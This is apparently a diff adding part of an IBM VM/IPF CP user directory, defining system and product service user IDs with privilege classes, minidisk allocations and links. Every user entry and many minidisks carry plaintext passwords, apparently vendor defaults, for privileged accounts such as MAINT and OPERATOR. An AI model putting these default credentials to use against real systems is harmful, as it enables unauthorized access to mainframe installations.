+ MDISK D01 3380 001 005 VMSRES R                                       03131808
+*
+USER $DIRECT$ NOLOG
+ MDISK E01 3380 492 002 VMSRES R                                       03131808
+*
+USER $SAVSYS$ NOLOG
+ MDISK F01 3380 006 011 VMSRES R                                       03131808
+ MDISK F02 3380 012 060 VMPK01 R                                       03131808
+*
+USER $SYSERR$ NOLOG
+ MDISK F03 3380 019 002 VMSRES R                                       03131808
+*
+USER $SYSCKP$ NOLOG
+ MDISK F04 3380 391 001 VMSRES R                                       03131808
+*
+USER $SYSWRM$ NOLOG
+ MDISK F05 3380 017 002 VMSRES R                                       03131808
+*
+***************************************************************
+*             SYSTEM RELATED USERIDS                          *
+***************************************************************
+*
+USER AUTOLOG1 AUTOLOG1 512K 1M ABCDEG
+INCLUDE EXPPROF
+ ACCOUNT 2 SYSTEM
+ MDISK 191 3380 094 001 VMPK01 MR RAUTOLOG WAUTOLOG MAUTOLOG           03131808
+*
+USER CMSBATCH CMSBATCH 1M 2M G
+ ACCOUNT 3 SYSTEM
+ OPTION ACCT
+ IPL CMS PARM AUTOCR
+ CONSOLE 009 3215
+ SPOOL 00C 2540 READER *
+ SPOOL 00D 2540 PUNCH  A
+ SPOOL 00E 1403 A
+ LINK MAINT 190 190 RR
+ MDISK 195 3380 095 002 VMPK01 MR RBATCH   WBATCH   MBATCH             03131808
+*
+USER CMSUSER CMSUSER 1M 3M G
+INCLUDE EXPPROF
+ ACCOUNT 101 USER01
+ MDISK 191 3380 091 003 VMPK01 MR RCMS     WCMS     MCMS               03131808
+*
+USER EREP EREP 768K 2M FG
+INCLUDE EXPPROF
+ ACCOUNT EREP IBMCE
+ LINK MAINT 201 192 RR
+ MDISK 191 3380 021 001 VMSRES WR READ     WRITE                       03131808
+*
+USER GCS  GCS  5M 6M  G
+ ACCOUNT GCS RECVM
+ OPTION ECMODE DIAG98
+ IPL GCS PARM AUTOLOG
+ CONSOLE 009 3215
+ SPOOL 00C 2540 READER *
+ SPOOL 00D 2540 PUNCH  A
+ SPOOL 00E 1403 A
+ LINK MAINT 190 190 RR
+ LINK MAINT 19D 19D RR
+ LINK MAINT 595 595 RR
+ LINK MAINT 59E 59E RR
+ MDISK 191 3380 514 005 VMPK01 MR RGCS     WGCS     MGCS               03131808
+*
+USER IVPM1 IVPM1 3M   16M G
+ ACCOUNT ACT4 IVPM1
+ CONSOLE 009 3210
+ SPOOL 00C 2540 READER *
+ SPOOL 00D 2540 PUNCH A
+ SPOOL 00E 1403 A
+ LINK MAINT 190 190 RR
+ LINK MAINT 193 193 RR
+ LINK MAINT 194 194 RR
+ LINK MAINT 19D 19D RR
+ MDISK 191 3380 868 001 VMSRES WR READ     WRITE                       03131808
+*
+USER IVPM2 IVPM2  3M   4M G
+ ACCOUNT ACT5 IVPM2
+ CONSOLE 009 3210
+ SPOOL 00C 2540 READER *
+ SPOOL 00D 2540 PUNCH A
+ SPOOL 00E 1403 A
+ LINK MAINT 190 190 RR
+ LINK MAINT 193 193 RR
+ LINK MAINT 194 194 RR
+ LINK MAINT 19D 19D RR
+ MDISK 191 3380 869 001 VMSRES WR READ     WRITE                       03131808
+*
+USER MAINT CPCMS 6M 16M ABCDEFG
+ ACCOUNT 1 SYSPROG
+ OPTION ECMODE DIAG98
+ IPL CMS
+ IUCV *CCS P M 10
+ IUCV ANY P M 0
+ CONSOLE 009 3215
+ SPOOL 00C 2540 READER *
+ SPOOL 00D 2540 PUNCH  A
+ SPOOL 00E 1403 A
+*
+ MDISK 123 3380 000 885 VMSRES MW RSYSRES  WSYSRES  MSYSRES            03131808
+ MDISK 124 3380 000 885 VMPK01 MW RSYSRES  WSYSRES  MSYSRES            03131808
+ MDISK 126 3380 000 885 VMSTGE MW RSYSRES  WSYSRES  MSYSRES            03131808
+ MDISK 127 3380 000 885 VMGCS1 MW RSYSRES  WSYSRES  MSYSRES            03131808
+ MDISK 129 3380 000 885 PROFPK MW RSYSRES  WSYSRES  MSYSRES            03131808
+ MDISK 130 3380 000 885 SQLPK  MW RSYSRES  WSYSRES  MSYSRES            03131808
+ MDISK 131 3380 000 885 VMPK02 MW RSYSRES  WSYSRES  MSYSRES            03131808
+*
+* 19D - Help files
+* 39D - Help files for NLS
+* 19E - CMS extension disk. Most program products go here
+* 190 - CMS nucleus and commands
+* 191 - MAINT work disk and system dependent files
+* 193 - CMS text / IPCS text / GCS interface texts
+* 194 - CP text files and Maclibs
+* 196 - HPO text files and Maclibs
+* 201 - EREP files
+* 293 - Aux and update files for CMS service
+* 294 - Aux and update files for CP service
+* 295 - CP/CMS EXPRESS/local service
+* 296 - HPO aux and update files for service
+* 3A0 - IPF online documentation
+* 300 - VM/IPF system support, administration and operation dialogs
+* 301 - IPF VM/VSE feature files
+* 31A - Customer procedures and products not from VM/EXPRESS
+* 310 - Maclibs for VM/IPF
+* 319 - Some optional Program Products
+* 393 - CMS source
+* 394 - CP SOURCE
+* 396 - HPO source
+* 492 - TSAF
+* 494 - TSAF
+* 496 - IPCS service files
+* 497 - IPCS source files
+* 59E - GCS System disk extension
+* 595 - GCS object code
+* 596 - GCS service files
+*
+ MDISK 19D 3380 308 025 VMSRES MW ALL      WMAINT   MMAINT             03131808
+ MDISK 39D 3380 333 025 VMSRES MW ALL      WMAINT   MMAINT             03131808
+ MDISK 19E 3380 245 147 VMPK01 MR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 190 3380 494 037 VMSRES MW ALL      WMAINT   MMAINT             03131808
+ MDISK 191 3380 088 010 VMSRES MW RMAINT   WMAINT   MMAINT             03131808
+ MDISK 193 3380 061 027 VMSRES MW RMAINT   WMAINT   MMAINT             03131808
+ MDISK 194 3380 022 027 VMSRES MW RMAINT   WMAINT   MMAINT             03131808
+ MDISK 196 3380 684 016 VMSRES MW RMAINT   WMAINT   MMAINT             03131808
+ MDISK 201 3380 567 023 VMSRES MW RMAINT   WMAINT   MMAINT             03131808
+ MDISK 293 3380 590 027 VMSRES MW RCMSAUX  WCMSAUX  MCMSAUX            03131808
+ MDISK 294 3380 663 021 VMSRES MW RCPAUX   WCPAUX   MCPAUX             03131808
+ MDISK 295 3380 531 014 VMSRES MW RUSRMOD  WUSRMOD  MUSRMOD            03131808
+ MDISK 296 3380 072 019 VMPK01 MW RCPAUX   WCPAUX   MCPAUX             03131808
+ MDISK 3A0 3380 128 001 VMPK01 MR ALL      WMAINT   MMAINT             03131808
+ MDISK 300 3380 097 015 VMPK01 MR ALL      WMAINT   MMAINT             03131808
+*MDISK 301 3380 001 049 EDMD01 MW ALL      WMAINT   MMAINT             03131808
+ MDISK 31A 3380 870 003 VMSRES MW ALL      WMAINT   MMAINT             03131808
+ MDISK 310 3380 112 016 VMPK01 MR ALL      WMAINT   MMAINT             03131808
+ MDISK 319 3380 617 015 VMSRES MW ALL      WMAINT   MMAINT             03131808
+ MDISK 393 3380 001 063 VMSTGE WR RMAINT   WMAINT                      03131808
+ MDISK 394 3380 064 076 VMSTGE WR RMAINT   WMAINT                      03131808
+ MDISK 396 3380 147 034 VMSTGE WR RMAINT   WMAINT                      03131808
+ MDISK 492 3380 195 011 VMPK01 MW RTSFOBJ  WTSFOBJ  MTSFOBJ            03131808
+ MDISK 494 3380 721 011 VMSRES MW RTSFAUX  WTSFAUX  MTSFAUX            03131808
+ MDISK 496 3380 782 001 VMPK01 MW RIPCX    WIPCSX   MIPSX              03131808
+ MDISK 497 3380 140 007 VMSTGE MW RMAINT   WMAINT                      03131808
+ MDISK 59E 3380 181 010 VMPK01 MW ALL      WMAINT   MMAINT             03131808
+ MDISK 595 3380 214 031 VMPK01 MW RMAINT   WMAINT   MMAINT             03131808
+ MDISK 596 3380 700 021 VMSRES MW RGCSAUX  WGCSAUX  MGCSAUX            03131808
+*
+* 29E - 5748-RC1 (PVM) - 5748-XP1 (RSCS V1) - Update files
+* 36E - 5748-RC1 PVM 191 disk
+* 39E - 5748-RC1 (PVM) - 5748-XP1 (RSCS V1) - Source files
+* 49E - 5748-RC1 (PVM) - 5748-XP1 (RSCS V1) - Text files
+*
+ MDISK 29E 3380 785 007 VMPK01 MR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 36E 3380 563 004 VMSRES RR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 39E 3380 181 045 VMSTGE WR RMAINT   WMAINT                      03131808
+ MDISK 49E 3380 792 007 VMPK01 MR RMAINT   WMAINT   MMAINT             03131808
+*
+* 348 - EP - ACF/NCP - NETVIEW - ACF/VTAM - ACF/SSP (VMFPARM DISK)
+*
+ MDISK 348 3380 001 002 VMGCS1 MR RMAINT   WMAINT   MMAINT             03131808
+*
+* 298 - 5664-280 VTAM 191
+* 299 - 5664-280 VTAM Base disk
+* 29A - 5664-280 VTAM Run disk
+* 29B - 5664-280 VTAM Merge disk
+* 29C - 5664-280 VTAM Zap disk
+* 29D - 5664-280 VTAM Delta disk
+*
+ MDISK 298 3380 005 009 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 299 3380 200 024 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 29A 3380 156 010 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 29B 3380 224 020 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 29C 3380 244 005 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 29D 3380 860 020 VMGCS1 MR RMAINT   WMAINT   MMAINT             03131808
+*
+* 33F - 5664-289 ACF/SSP Base disk
+* 340 - 5664-289 ACF/SSP Delta disk
+* 341 - 5664-289 ACF/SSP Merge disk
+* 342 - 5664-289 ACF/SSP Zap disk
+* 343 - 5664-289 ACF/SSP Run disk
+*
+ MDISK 33F 3380 687 048 VMGCS1 MR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 340 3380 830 010 VMGCS1 MR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 341 3380 840 020 VMGCS1 MR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 342 3380 249 010 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 343 3380 110 046 VMGCS1 MR RMAINT   WMAINT   MMAINT             03131808
+*
+* 352 - 5735-XXB (EP) - 5668-854 (ACF/NCP) Base disk
+* 353 - 5735-XXB (EP) - 5668-854 (ACF/NCP) Delta disk
+* 354 - 5735-XXB (EP) - 5668-854 (ACF/NCP) Merge disk
+* 355 - 5735-XXB (EP) - 5668-854 (ACF/NCP) Run disk
+* 356 - 5735-XXB (EP) - 5668-854 (ACF/NCP) Zap disk
+*
+ MDISK 352 3380 259 066 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 353 3380 325 010 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 354 3380 335 020 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 355 3380 355 088 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 356 3380 443 010 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
+*
+* 349 - 5735-XXB (EP) - 5668-754 (ACF/NCP subset for 3720) VMFPARM DISK
+* 357 - 5735-XXB (EP) - 5668-754 (ACF/NCP subset for 3720) Base disk
+* 358 - 5735-XXB (EP) - 5668-754 (ACF/NCP subset for 3720) Delta disk
+* 359 - 5735-XXB (EP) - 5668-754 (ACF/NCP subset for 3720) Merge disk
+* 35A - 5735-XXB (EP) - 5668-754 (ACF/NCP subset for 3720) Zap disk
+* 35B - 5735-XXB (EP) - 5668-754 (ACF/NCP subset for 3720) Run disk
+*
+ MDISK 349 3380 003 002 VMGCS1 MR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 357 3380 453 066 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 358 3380 519 010 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 359 3380 529 020 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 35A 3380 637 010 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 35B 3380 549 088 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
+*
+* 330 - 5664-204 NETVIEW Base disk
+* 331 - 5664-204 NETVIEW Delta disk
+* 332 - 5664-204 NETVIEW Merge disk
+* 333 - 5664-204 NETVIEW Zap disk
+* 334 - 5664-204 NETVIEW Run disk
+*
+ MDISK 330 3380 735 095 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 331 3380 647 010 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 332 3380 657 020 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 333 3380 677 010 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 334 3380 014 096 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
+*
+* 29F - 5664-188 RSCSV2 Update files
+* 39F - 5664-188 RSCSV2 User exits disk
+* 49F - 5664-188 RSCSV2 Text disk
+* 59F - 5664-188 RSCSV2 191 disk
+*
+ MDISK 29F 3380 129 004 VMPK01 MR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 39F 3380 799 004 VMPK01 MR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 49F 3380 803 010 VMPK01 MR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 59F 3380 208 006 VMPK01 MR RMAINT   WMAINT   MMAINT             03131808
+*
+* 322 - 5664-283 VM/IS
+* 326 - 5664-283 VM/IS
+* 34A - 5668-905 Graphical Display and Query Facility (GDQF)
+* 346 - 5668-AAA Query Management Facility (QMF)
+* 347 - 5668-AAA Query Management Facility (QMF)
+* 360 - 5664-329 Contextual File Search (CFSearch/370)
+* 361 - 5664-370 Display Write/370
+* 363 - 5668-890 Font Library Service Facility (FLSF)
+*
+ MDISK 322 3380 734 007 VMPK01 MR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 326 3380 166 010 VMPK01 MR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 34A 3380 164 052 VMSRES MR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 346 3380 207 013 SQLPK  MR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 347 3380 220 023 SQLPK  MR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 360 3380 216 040 VMSRES MR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 361 3380 768 027 VMSRES MR RMAINT   WMAINT   MMAINT             03131808
+ MDISK 363 3380 795 009 VMSRES MR RMAINT   WMAINT   MMAINT             03131808
+*
+USER OPERATNS OPERATNS 1M  2M BCEG
+INCLUDE EXPPROF
+ ACCOUNT 13 SYSPROG
+ LINK MAINT 300 300 RR
+ LINK MAINT 193 192 RR
+ MDISK 191 3380 547 001 VMSRES MR RIPCS    WIPCS    MIPCS              03131808
+ MDISK 193 3380 256 008 VMSRES MR RIPCS    WIPCS    MIPCS              03131808
+*
+USER OPERATOR OPERATOR  3M 16M ABCDEFG
+ ACCOUNT 2 OPERATOR
+ IPL CMS PARM AUTOCR
+ CONSOLE 009 3215 T MAINT
+ SPOOL 00C 2540 READER *
+ SPOOL 00D 2540 PUNCH  A
+ SPOOL 00E 1403 A
+ LINK MAINT 190 190 RR
+ LINK MAINT 19D 19D RR
+ LINK MAINT 19E 19E RR
+ LINK MAINT 300 300 RR
+ MDISK 191 3380 545 002 VMSRES MR ROPER    WOPER    MOPER              03131808
+*
+USER SYSDUMP1 SYSDUMP1 1M 1M BG
+INCLUDE EXPPROF
+ ACCOUNT 16 SYSTEM
+ LINK MAINT 300 300 RR
+ MDISK 123 3380 000 885 VMSRES RR                                      03131808
+ MDISK 124 3380 000 885 VMPK01 RR                                      03131808
+ MDISK 126 3380 000 885 VMSTGE RR                                      03131808
+ MDISK 127 3380 000 885 VMGCS1 RR                                      03131808
+ MDISK 129 3380 000 885 PROFPK RR                                      03131808
+ MDISK 130 3380 000 885 SQLPK  RR                                      03131808
+ MDISK 131 3380 000 885 VMPK02 RR                                      03131808
+ MDISK 191 3380 133 001 VMPK01 MR RSYSDUMP WSYSDUMP MSYSDUMP           03131808
+*
+USER TSAFVM TSAFVM 4M 8M G
+ ACCOUNT 1 XXXXXX
+ OPTION MAXCONN 256 BMX ECMODE COMSRV ACCT CONCEAL REALTIMER
+ IUCV ALLOW
+ IUCV *CRM
+ IPL CMS PARM AUTOCR
+ CONSOLE 009 3215 A OPERATOR
+ SPOOL 00C 2540 READER *
+ SPOOL 00D 2540 PUNCH  A
+ SPOOL 00E 1403 A
+ LINK MAINT 190 190 RR
+ LINK MAINT 19D 19D RR
+ LINK MAINT 19E 19E RR
+ LINK MAINT 492 192 RR
+ LINK MAINT 494 494 RR
+*DEDICATE 300 4A0
+ MDISK 191 3380 206 002 VMPK01 MR                                      03131808
+*
+USER VSEMAINT VSEMAINT 1M 4M BG
+INCLUDE EXPPROF
+ ACCOUNT 211 DOSSYS
+ LINK MAINT 300 300 RR
+*LINK MAINT 301 301 RR
+ MDISK 191 3380 632 004 VMSRES MR RVSEMAIN WVSEMAIN MVSEMAIN           03131808
+*
+USER VSEIPO VSEIPO  16M 16M G
+*
+* SAMPLE USERID TO RUN VSE/EXPRESS/IPO
+*
+ ACCOUNT 203 VSEIPO
+ IPL 224
+*OPTION ECMODE BMX REALTIMER VIRT=REAL MAXCONN 050 STF  370E
+ OPTION ECMODE BMX REALTIMER  MAXCONN 050
+ IUCV *CCS PRIORITY MSGLIMIT 050
+ CONSOLE 01F 3270
+ SPECIAL 401 3270
+ SPECIAL 402 3270
+ SPECIAL 403 3270
+ SPECIAL 404 3270
+ SPECIAL 405 3270
+ SPECIAL 406 3270
+ SPECIAL 407 3270
+ SPECIAL 408 3270
+ SPECIAL 409 3270
+ SPECIAL 40A 3270
+ SPECIAL 40B 3270
+ SPECIAL 40C 3270
+ SPECIAL 40D 3270
+ SPECIAL 40E 3270
+ SPECIAL 40F 3270
+ SPECIAL 410 3270
+ SPECIAL 411 3270
+ SPECIAL 412 3270
+ SPECIAL 413 3270
+ SPECIAL 414 3270
+ SPECIAL 415 3270
+ SPECIAL 416 3270
+ SPECIAL 417 3270
+ SPECIAL 418 3270
+ SPECIAL 419 3270
+ SPECIAL 41A 3270
+ SPECIAL 41B 3270
+ SPECIAL 41C 3270
+ SPECIAL 41D 3270
+ SPECIAL 41E 3270
+ SPECIAL 41F 3270
+ SPOOL 00C 3505 A
+ SPOOL 00D 3525 A
+ SPOOL 00E 3203 A
+ SPOOL 05D 3525 A
+ SPOOL 05E 1403 A
+ DEDICATE  300  400
+ DEDICATE  080  080
+ LINK MAINT 190 190 RR
+ LINK MAINT 19E 19E RR
+ LINK VSEMAINT 191 191 RR
+* 3380 SYSTEM
+*MDISK 150 3380 000 885 DOSRES MR VSEIPO  VSEIPO
+*MDISK 151 3380 000 885 SYSWK1 MR VSEIPO  VSEIPO
+*MDISK 152 3380 000 885 SYSWK2 MR VSEIPO  VSEIPO
+* 3375 SYSTEM
+*MDISK 140 3375 000 959 DOSRES MR VSEIPO  VSEIPO
+*MDISK 141 3375 000 959 SYSWK1 MR VSEIPO  VSEIPO
+*MDISK 142 3375 000 959 SYSWK2 MR VSEIPO  VSEIPO
+* FB-512 SYSTEM
+*MDISK 240 FB-512 00000 558000 DOSRES MR VSEIPO VSEIPO
+*MDISK 241 FB-512 00000 558000 SYSWK1 MR VSEIPO VSEIPO
+*MDISK 242 FB-512 00000 558000 SYSWK2 MR VSEIPO VSEIPO
+* 3350 SYSTEM
+ MDISK 220 3350 000 555 SYSWKB MR VSE220  VSE0WO
+ MDISK 222 3350 000 555 SYSWK2 MR VSE222  VSE2WO
+ MDISK 223 3350 000 555 SYSWK4 MR VSE223  VSE3WO
+ MDISK 224 3350 000 555 DOSRES MR VSE224  VSE4WO
+ MDISK 225 3350 000 555 SYSWK1 MR VSE225  VSE5WO
+* 3380 SYSTEM
+ MDISK 200 3380 000 885 SYSWKA MR VSE219  VSEAWO
+*
+USER ROUTER ROUTER 512K 2M G 64 ON ON ON ON
+INCLUDE EXPPROF
+ ACCOUNT 46 ROUTER
+ MDISK 191 3380 636 003 VMSRES MR RROUTER  WROUTER  MROUTER            03131808
+*
+USER AP2SVP AP2SVP 512K 8M EG 64 ON ON ON ON
+*
+* 5668899 APL2 SERVICE MACHINE
+*
+INCLUDE EXPPROF
+ ACCOUNT 9999 APL2-SVP
+ MDISK 191 3380 731 003 VMPK01 MR RAP2SVP  WAP2SVP  MAP2SVP            03131808
+*
+USER APL2PP APL2PP 3M 16M BEG 64 ON ON ON ON
+*
+* 5668899 APL2
+*
+INCLUDE EXPPROF
+ ACCOUNT 9999 I5668899
+ MDISK 191 3380 264 044 VMSRES MR ALL      WAPL2PP                     03131808
+*
+USER VMASSYS VMASSYS 16M 16M EG 64 ON ON ON ON
+*
+* 5767032 AS
+*
+INCLUDE EXPPROF
+ ACCOUNT 15 SYSTEM
+ LINK ISPVM 192 192 RR
+ LINK SQLDBA 195 195 RR
+ MDISK 191 3380 569 018 VMPK01 MR RVMASSYS WVMASSYS INSTALL            03131808
+ MDISK 391 3380 587 095 VMPK01 MR RVMASSYS WVMASSYS SYSTEM             03131808
+ MDISK 392 3380 682 005 VMPK01 MR RVMASSYS WVMASSYS TEST               03131808
+ MDISK 393 3380 687 026 VMPK01 MR RVMASSYS WVMASSYS IPCS               03131808
+*
+USER VMASMON VMASMON 2M 2M G 64 ON ON ON ON
+*
+* 5767032 AS
+*
+INCLUDE EXPPROF
+ ACCOUNT 15 SYSTEM
+ OPTION MAXCONN 20
+ IUCV ALLOW
+ LINK VMASSYS 191 390 RR
+ LINK VMASSYS 391 391 RR
+ MDISK 191 3380 567 002 VMPK01 MR RVMASMON WVMASMON MVMASMON           03131808
+*
+USER VMASTEST VMASTEST 2M 2M G 64 ON ON ON ON
+*
+* 5767032 AS
+*
+INCLUDE EXPPROF
+ ACCOUNT 15 SYSTEM
+ LINK VMASSYS 391 391 RR
+ LINK VMASSYS 392 392 RR
+ MDISK 191 3380 713 018 VMPK01 MR RVMASTES WVMASTES MVMASTES           03131808
+*
+USER BATCH BATCH 2M 2M ABEG 64 ON ON ON ON
+*
+* 5664364 VM BATCH FACILITY
+*
+INCLUDE EXPPROF
+ ACCOUNT 999
+ IUCV ALLOW
+ OPTION BMX MAXCONN 256
+ MDISK 191 3380 741 003 VMPK01 MR RVMBATCH WVMBATCH MVMBATCH           03131808
+ MDISK 193 3380 744 020 VMPK01 MR RVMBATCH WVMBATCH MVMBATCH           03131808
+ MDISK 194 3380 764 003 VMPK01 MR RVMBATCH WVMBATCH MVMBATCH           03131808
+ MDISK 199 3380 767 002 VMPK01 RR RVMBATCH WVMBATCH MVMBATCH           03131808
+ MDISK 195 3380 769 002 VMPK01 MR RVMBATCH WVMBATCH MVMBATCH           03131808
+*
+USER BATCH1 BATCH1 2M 4M G 64 ON ON ON ON
+*
+* 5664364 VM BATCH FACILITY TEST USERID
+*
+INCLUDE EXPPROF
+ ACCOUNT 999
+ MDISK 191 3380 771 005 VMPK01 MR RVMBATCH WVMBATCH MVMBATCH           03131808
+*
+USER BATCH2 BATCH2 2M 4M G 64 ON ON ON ON
+*
+* 5664364 VM BATCH FACILITY TEST USERID
+*
+INCLUDE EXPPROF
+ ACCOUNT 999
+ MDISK 191 3380 776 005 VMPK01 MR RVMBATCH WVMBATCH MVMBATCH           03131808
+*
+* USER CSPUSER CSPUSER 2M 4M G 64 ON ON ON ON
+*
+* 5668814 CSP
+*
+* INCLUDE EXPPROF
+* ACCOUNT 101
+* MDISK 191 3380 134 032 VMPK01 MR RCSPUSER WCSPUSER MCSPUSER          03131808
+* MDISK 193 3380 519 008 VMPK01 MR RCSPUSER WCSPUSER MCSPUSER          03131808
+* MDISK 502 3380 527 020 VMPK01 MR RCSPUSER WCSPUSER MCSPUSER          03131808
+* MDISK 503 3380 547 020 VMPK01 MR RCSPUSER WCSPUSER MCSPUSER          03131808
+*
+USER CVIEW CVIEW 2M 2M G 64 ON ON ON ON
+*
+* 5664296 CVIEW
+*
+INCLUDE EXPPROF
+ ACCOUNT 15 SYSTEM
+ OPTION BMX
+ LINK MAINT 193 193 RR
+ MDISK 191 3380 732 004 VMSRES MR RCVIEW   WCVIEW                      03131808
+*
+USER DIRMAINT DIRMAINT 1M 2M BG 64 ON ON ON ON
+*
+* 5748XE4 DIRMAINT
+*
+INCLUDE EXPPROF
+ ACCOUNT 7 SYSADMIN
+ OPTION REALTIME ECMODE
+ MDISK 191 3380 191 004 VMPK01 MR RDIRMAIN WDIRMAIN MDIRMAIN           03131808
+ MDISK 193 3380 001 009 VMPK01 MR RDIRMAIN WDIRMAIN MDIRMAIN           03131808
+ MDISK 195 3380 049 009 VMSRES MR RDIRMAIN WDIRMAIN MDIRMAIN           03131808
+ MDISK 294 3380 844 004 VMPK01 MR RDIRMAIN WDIRMAIN MDIRMAIN           03131808
+ MDISK 394 3380 226 019 VMSTGE MR RDIRMAIN WDIRMAIN MDIRMAIN           03131808
+ MDISK 123 3380 000 885 VMSRES MW                                      03131808
+*
+USER DATAMOVE DATAMOVE 1M 1M G 64 ON ON ON ON
+*
+* 5748XE4 DATAMOVE MACHINE
+*
+INCLUDE EXPPROF
+ ACCOUNT 5 SYSADMIN
+ OPTION ACCT ECMODE
+ LINK DIRMAINT 191 193 RR
+ LINK MAINT    193 192 RR
+ MDISK 191 3380 178 003 VMPK01 MR RDATAMOV WDATAMOV MDATAMOV           03131808
+*
+USER FSFCNTRL FSFCNTRL 2M 16M ABG 64 ON ON ON ON
+*
+* 5798DMY FILE STORAGE CONTROL MACHINE
+*
+INCLUDE EXPPROF
+ ACCOUNT 999
+ OPTION ECMODE BMX MAXCONN 256
+ IUCV ALLOW PRIORITY MSGLIMIT 255
+ LINK FSFADMIN 192 198 RR
+ MDISK 191 3380 143 007 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR           03131808
+ MDISK 192 3380 141 002 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR           03131808
+ MDISK 193 3380 150 002 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR           03131808
+ MDISK 194 3380 152 001 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR           03131808
+ MDISK 195 3380 153 001 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR           03131808
+ MDISK 197 3380 154 001 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR           03131808
+ MDISK 200 3380 155 005 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR           03131808
+ MDISK 201 3380 160 005 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR           03131808
+ MDISK 400 3380 165 005 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR           03131808
+ MDISK 401 3380 170 005 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR           03131808
+*
+USER FSFTASK1 FSFTASK1 1M 1M G 64 ON ON ON ON
+*
+* 5798DMY FILE STORAGE TASK MACHINE
+*
+INCLUDE EXPPROF
+ ACCOUNT 999
+ OPTION BMX MAXCONN 2
+ IUCV ALLOW PRIORITY MSGLIMIT 255
+ LINK FSFCNTRL 191 191 RR
+*
+USER FSFTASK2 FSFTASK2 1M 1M G 64 ON ON ON ON
+*
+* 5798DMY FILE STORAGE TASK MACHINE
+*
+INCLUDE EXPPROF
+ ACCOUNT 999
+ OPTION BMX MAXCONN 2
+ IUCV ALLOW PRIORITY MSGLIMIT 255
+ LINK FSFCNTRL 191 191 RR
+*
+USER FSFADMIN FSFADMIN 1M 1M G 64 ON ON ON ON
+*
+* 5798DMY FILE STORAGE ADMINISTRATOR
+*
+INCLUDE EXPPROF
+ ACCOUNT 999
+ OPTION BMX MAXCONN 2
+ IUCV ALLOW PRIORITY MSGLIMIT 255
+ LINK MAINT 319 319 RR
+ MDISK 192 3380 175 003 VMPK02 MR RFSFADMI WFSFADMI MFSFADMI           03131808
+*
+USER IIPS IIPS 2M 4M G 64 ON ON ON ON
+*
+* 5668012 IIPS
+*
+INCLUDE EXPPROF
+ ACCOUNT 8 INSTR
+ MDISK 191 3380 736 013 VMSRES MR RIIPS    WIIPS    MIIPS              03131808
+ MDISK 193 3380 749 019 VMSRES MR RIIPS    WIIPS    MIIPS              03131808
+*
+USER ADMIN ADMIN 1664K 16M ABCDEFG 64 ON ON ON ON
+*
+* 5664318 VM/IPF
+*
+INCLUDE EXPPROF
+ LINK MAINT 300 300 RR
+ MDISK 191 3380 781 001 VMPK01 MR RADMIN   WADMIN   MADMIN             03131808
+*
+USER DISKACNT DISKACNT 512K 2M G 64 ON ON ON ON
+*
+* 5664318 VM/IPF
+*
+INCLUDE EXPPROF
+ OPTION ECMODE
+ LINK MAINT 300 300 RR
+ MDISK 191 3380 010 002 VMPK01 MR RDISKACN WDISKACN MDISKACN           03131808
+*
+USER CPRM CPRM 512K 1M G 64 ON ON ON ON
+*
+* 5664318 VM/IPF
+*
+INCLUDE EXPPROF
+ LINK OPERATNS 193 193 RR
+ MDISK 191 3380 783 001 VMPK01 MR RCPRM    WCPRM    MCPRM              03131808
+ MDISK 192 3380 098 007 VMSRES MR ALL      WCPRM    MCPRM              03131808
+ MDISK 291 3380 784 001 VMPK01 MR RCPRM    WCPRM    MCPRM              03131808
+*
+USER OP1 OP1 1M 13M ABCDEFG 64 ON ON ON ON
+*
+* 5664318 VM/IPF
+*
+INCLUDE EXPPROF
+ LINK MAINT 300 300 RR
+ MDISK 191 3380 058 001 VMSRES MR ROP1     WOP1     MOP1               03131808
+*
+USER VMUTIL VMUTIL 512K 2M ABDEG 64 ON ON ON ON
+*
+* 5664318 VM/IPF
+*
+INCLUDE EXPPROF
+ IPL CMS
+ OPTION ECMODE
